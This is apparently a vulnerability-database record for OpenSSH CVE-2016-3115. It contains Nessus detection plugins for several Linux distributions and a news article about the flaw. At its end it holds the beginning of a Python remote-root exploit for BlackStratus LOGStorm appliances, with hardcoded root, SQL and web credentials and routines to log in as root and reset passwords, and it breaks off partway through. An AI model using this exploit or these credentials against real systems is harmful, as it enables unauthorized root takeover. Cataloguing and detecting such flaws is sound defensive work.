"p-cpe:/a:amazon:linux:openssh-ldap", "p-cpe:/a:amazon:linux:openssh-debuginfo", "p-cpe:/a:amazon:linux:openssh-server", "p-cpe:/a:amazon:linux:openssh", "p-cpe:/a:amazon:linux:openssh-keycat", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-668.NASL", "href": "https://www.tenable.com/plugins/nessus/89965", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-668.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89965);\n script_version(\"2.5\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"ALAS\", value:\"2016-668\");\n\n script_name(english:\"Amazon Linux AMI : openssh (ALAS-2016-668)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the OpenSSH server did not sanitize data\nreceived in requests to enable X11 forwarding. An authenticated client\nwith restricted SSH access could possibly use this flaw to bypass\nintended restrictions.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-668.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update openssh' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssh-keycat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssh-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:pam_ssh_agent_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"openssh-6.6.1p1-23.60.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssh-clients-6.6.1p1-23.60.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssh-debuginfo-6.6.1p1-23.60.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssh-keycat-6.6.1p1-23.60.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssh-ldap-6.6.1p1-23.60.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssh-server-6.6.1p1-23.60.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"pam_ssh_agent_auth-0.9.3-9.23.60.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-clients / openssh-debuginfo / openssh-keycat / etc\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T10:14:44", "description": "This update provides recent upstream (security) release, sanitizing\nX11 authentication credentials.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-14T00:00:00", "title": "Fedora 23 : openssh-7.2p2-1.fc23 (2016-bb59db3c86)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-03-14T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:openssh", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-BB59DB3C86.NASL", "href": "https://www.tenable.com/plugins/nessus/89887", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-bb59db3c86.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89887);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"FEDORA\", value:\"2016-bb59db3c86\");\n\n script_name(english:\"Fedora 23 : openssh-7.2p2-1.fc23 (2016-bb59db3c86)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update provides recent upstream (security) release, sanitizing\nX11 authentication credentials.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1316829\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178838.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9cba1a66\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"openssh-7.2p2-1.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-06T13:23:45", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2016-3115: missing sanitisation of input for X11\n forwarding (#1317817)\n\n - Restore functionallity of pam_ssh_agent_auth in FIPS\n mode (#1278315)\n\n - Initialize devices_done variable for challenge response\n (#1281468)\n\n - Update behaviour of X11 forwarding to match upstream\n (#1299048)\n\n - Ammends previous release, fixing typos and behaviour\n changes", "edition": 28, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-05-16T00:00:00", "title": "OracleVM 3.3 / 3.4 : openssh (OVMSA-2016-0048)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-05-16T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.4", "cpe:/o:oracle:vm_server:3.3", "p-cpe:/a:oracle:vm:openssh-clients", "p-cpe:/a:oracle:vm:openssh", "p-cpe:/a:oracle:vm:openssh-server"], "id": "ORACLEVM_OVMSA-2016-0048.NASL", "href": "https://www.tenable.com/plugins/nessus/91153", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0048.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91153);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-3115\");\n\n script_name(english:\"OracleVM 3.3 / 3.4 : openssh (OVMSA-2016-0048)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2016-3115: missing sanitisation of input for X11\n forwarding (#1317817)\n\n - Restore functionallity of pam_ssh_agent_auth in FIPS\n mode (#1278315)\n\n - Initialize devices_done variable for challenge response\n (#1281468)\n\n - Update behaviour of X11 forwarding to match upstream\n (#1299048)\n\n - Ammends previous release, fixing typos and behaviour\n changes\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2016-May/000462.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2016-May/000461.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected openssh / openssh-clients / openssh-server\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"openssh-5.3p1-117.el6\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"openssh-clients-5.3p1-117.el6\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"openssh-server-5.3p1-117.el6\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"openssh-5.3p1-117.el6\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"openssh-clients-5.3p1-117.el6\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"openssh-server-5.3p1-117.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-clients / openssh-server\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T10:14:01", "description": "Sync with openssh package.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-04-27T00:00:00", "title": "Fedora 23 : gsi-openssh-7.2p2-1.fc23 (2016-188267b485)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-04-27T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gsi-openssh", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-188267B485.NASL", "href": "https://www.tenable.com/plugins/nessus/90726", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-188267b485.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90726);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"FEDORA\", value:\"2016-188267b485\");\n\n script_name(english:\"Fedora 23 : gsi-openssh-7.2p2-1.fc23 (2016-188267b485)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sync with openssh package.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1318201\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-April/183122.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?795cacc8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gsi-openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gsi-openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"gsi-openssh-7.2p2-1.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gsi-openssh\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:38", "bulletinFamily": "info", "cvelist": ["CVE-2016-3115"], "description": "Users who choose to enable X11Forwarding in OpenSSH, or those who use software products that re-enable it, should pay close attention to last Wednesday\u2019s OpenSSH security update.\n\nThe latest version of the open source implementation of the SSH protocol patches a flaw that exposes it to command injection attacks. The open source project cautions that OpenSSH disabled X11Forwarding long ago\u2014it is no longer the default configuration\u2014thus limiting the risk to most users. But some vendors\u2014OpenSSH singled out Red Hat in particular\u2014turn X11Forwarding on and those versions prior to 7.2p2 with X11Forwarding enabled are at risk.\n\n\u201cRed Hat enables X11Forwarding on the server side by default, but disables it on the client side by default,\u201d Red Hat said in a statement provided to Threatpost. \u201cClients should only enable it when they trust the server they are connecting to.\u201d\n\nRed Hat said it rated the vulnerability, CVE-2016-3115, [\u201cmoderate\u201d severity](<https://access.redhat.com/security/cve/CVE-2016-3115>).\n\n\u201cA few vendors\u2014Red Hat in particular\u2014re-enabled the feature in their own redistribution of OpenSSH in their products, against our advice,\u201d said OpenBSD founder and OpenSSH project leader Theo de Raadt. \u201cWe try to ship with safe defaults. They instead shipped with unsafe defaults.\u201d\n\nAn [advisory](<http://www.openssh.com/txt/x11fwd.adv>) published last Wednesday by OpenSSH explains that untrusted inputs are not properly sanitized allowing an authenticated user who is able to request X11Forwarding to inject commands to xauth. An attacker could abuse this to read files as a privileged user, or use other xauth commands to leak information, overwrite files, probe ports and more.\n\nFrom the OpenSSH advisory:\n\n> \u201cAs part of establishing an X11 forwarding session, sshd accepts an X11 authentication credential from the client. This credential is supplied to the xauth utility to establish it for X11 applications that the user subsequently runs. The contents of the credential\u2019s components (authentication scheme and credential data) were not sanitized to exclude meta-characters such as newlines. An attacker could therefore supply a credential that injected commands to xauth. The attacker could then use a number of xauth commands to read or overwrite arbitrary files subject to file permissions, connect to local ports or perform attacks on xauth itself.\u201d\n\nDe Raadt said that X11Forwarding should be enabled only on a case-by-case basis.\n\n\u201cOpenSSH serves many purposes: interactive logins, forwarding features, and tunnel features used in a more automated fashion,\u201d de Raadt said. \u201cAfter that time, we added some additional features to make automated services (git/rsync/etc,\u2026) services more restricted, a variety of lockdown features. It is a similar idea\u2014that people use the lockdown features on the accounts/services where they need it.\n\n\u201cWith this new bug the two parts have collided,\u201d de Raadt said. \u201cIf X11Forwarding is \nenabled, the lockdown features can be bypassed.\u201d\n\nDe Raadt said that OpenSSH has been, for two years, disabling older, insecure crypto implementations.\n\n\u201cWe are deprecating everything we can, to avoid a \u2018Heartbleed\u2019 scenario in OpenSSH,\u201d de Raadt said. \u201cA few specific vendors are taking our new code, and immediately re-enabling insecure algorithms, and we believe they are simply unqualified to make those decisions.\u201d\n", "modified": "2016-03-15T20:06:09", "published": "2016-03-15T16:06:09", "id": "THREATPOST:F895E4C708DB124636408645530A739D", "href": "https://threatpost.com/openssh-implementations-with-x11forwarding-enabled-should-heed-recent-security-update/116801/", "type": "threatpost", "title": "OpenSSH Implementations with X11Forwarding Enabled Should Heed Recent Security Update", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:27", "description": "", "published": "2016-12-05T00:00:00", "type": "packetstorm", "title": "BlackStratus LOGStorm 4.5.1.35 / 4.5.1.96 Remote Root", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115"], "modified": "2016-12-05T00:00:00", "id": "PACKETSTORM:140019", "href": "https://packetstormsecurity.com/files/140019/BlackStratus-LOGStorm-4.5.1.35-4.5.1.96-Remote-Root.html", "sourceData": "`#!/usr/bin/python \n# logstorm-root.py \n# \n# BlackStratus LOGStorm Remote Root Exploit \n# \n# Jeremy Brown [jbrown3264/gmail] \n# Dec 2016 \n# \n# -Synopsis- \n# \n# \"Better Security and Compliance for Any Size Business\" \n# \n# BlackStratus LOGStorm has multiple vulnerabilities that allow a remote unauthenticated user, among \n# other things, to assume complete control over the virtual appliance with root privileges. This is \n# possible due to multiple network servers listening for network connections by default, allowing \n# authorization with undocumented credentials supported by appliance's OS, web interface and sql server. \n# \n# -Tested- \n# \n# v4.5.1.35 \n# v4.5.1.96 \n# \n# -Usage- \n# \n# Dependencies: pip install paramiko MySQL-python \n# \n# There are (5) actions provided in this script: root, reset, sql, web and scan. \n# \n# [root] utilizes bug #1 to ssh login to a given <host> as root and run the 'id' command \n# [reset] utilizes bug #2 to ssh login to a given <host> as privileged htinit user and resets the root password \n# [sql*] utilizes bug #3 to sql login to a given <host> as privileged htr user and retrieve web portal credentials \n# [web] utilizes bug #4 to http login to a given <host> as hardcoded webserveruser (presumably) admin account \n# [scan] scans a given <host>/24 for potentially vulnerable appliances \n# \n# *sql only works remotely before license validation as afterwards sql server gets firewalled, becoming local only. \n# \n# Note: this exploit is not and cannot be weaponized simply because exploits are not weapons. \n# \n# -Fixes- \n# \n# BlackStratus did not coherently respond to product security inquiries, so there's no official fix. But \n# customers may (now) root the appliance themselves to change the passwords, disable root login, firewall \n# network services or remove additional user accounts to mitigate these vulnerabilities.. or choose another \n# product altogether because this appliance, as of today, simply adds too much attack surface to the network. \n# \n# -Bonuses- \n# \n# 1) Another account's (htftp/htftp) shell is set to /bin/false, which affords at least a couple attacks \n# \n# 1.1) The appliance is vulnerable to CVE-2016-3115, which we can use to read/write to arbitrary files \n# 1.2) We can use the login to do port forwarding and hit local services, such as the Java instance running \n# in debug mode and probably exploitable with jdwp-shellifer.py (also netcat with -e is installed by default!) \n# \n# 2) More sql accounts: htm/htm_pwd and tvs/tvs_pwd \n# \n \nimport sys \nimport socket \nimport time \nfrom paramiko import ssh_exception \nimport paramiko \nimport MySQLdb \nimport httplib \nimport urllib \n \nSSH_BANNER = \"_/_/_/_/\" \nSSH_PORT = 22 \nMYSQL_PORT = 3306 \nMYSQL_DB = \"htr\" \nMYSQL_CMD = \"select USER_ID,hex(MD5_PASSWORD) from users;\" \nWEB_URL = \"/tvs/layout/j_security_check\" \n \nROOT_CREDS = [\"root\", \"3!acK5tratu5\"] \nHTINIT_CREDS = [\"htinit\", \"htinit\"] \nMYSQL_CREDS = [\"htr\", \"htr_pwd\"] \nWEB_CREDS = [\"webserviceuser\", \"donotChangeOnInstall\"] \n \n \ndef main(): \nif(len(sys.argv) < 2): \nprint(\"Usage: %s <action> <host>\" % sys.argv[0]) \nprint(\"Eg. %s root 10.1.1.3\\n\" % sys.argv[0]) \nprint(\"Actions: root reset sql web scan\") \nreturn \n \naction = str(sys.argv[1]) \nhost = str(sys.argv[2]) \n \nif(\"scan\" not in action): \ntry: \nsocket.inet_aton(host) \nexcept socket.error: \nprint(\"[-] %s doesn't look like a valid ip address\" % host) \nreturn \n \nssh = paramiko.SSHClient() \nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \n \n# \n# ssh login as root and execute 'id' \n# \nif(action == \"root\"): \ntry: \nssh.connect(host, SSH_PORT, ROOT_CREDS[0], ROOT_CREDS[1], timeout=SSH_TIMEOUT) \nexcept 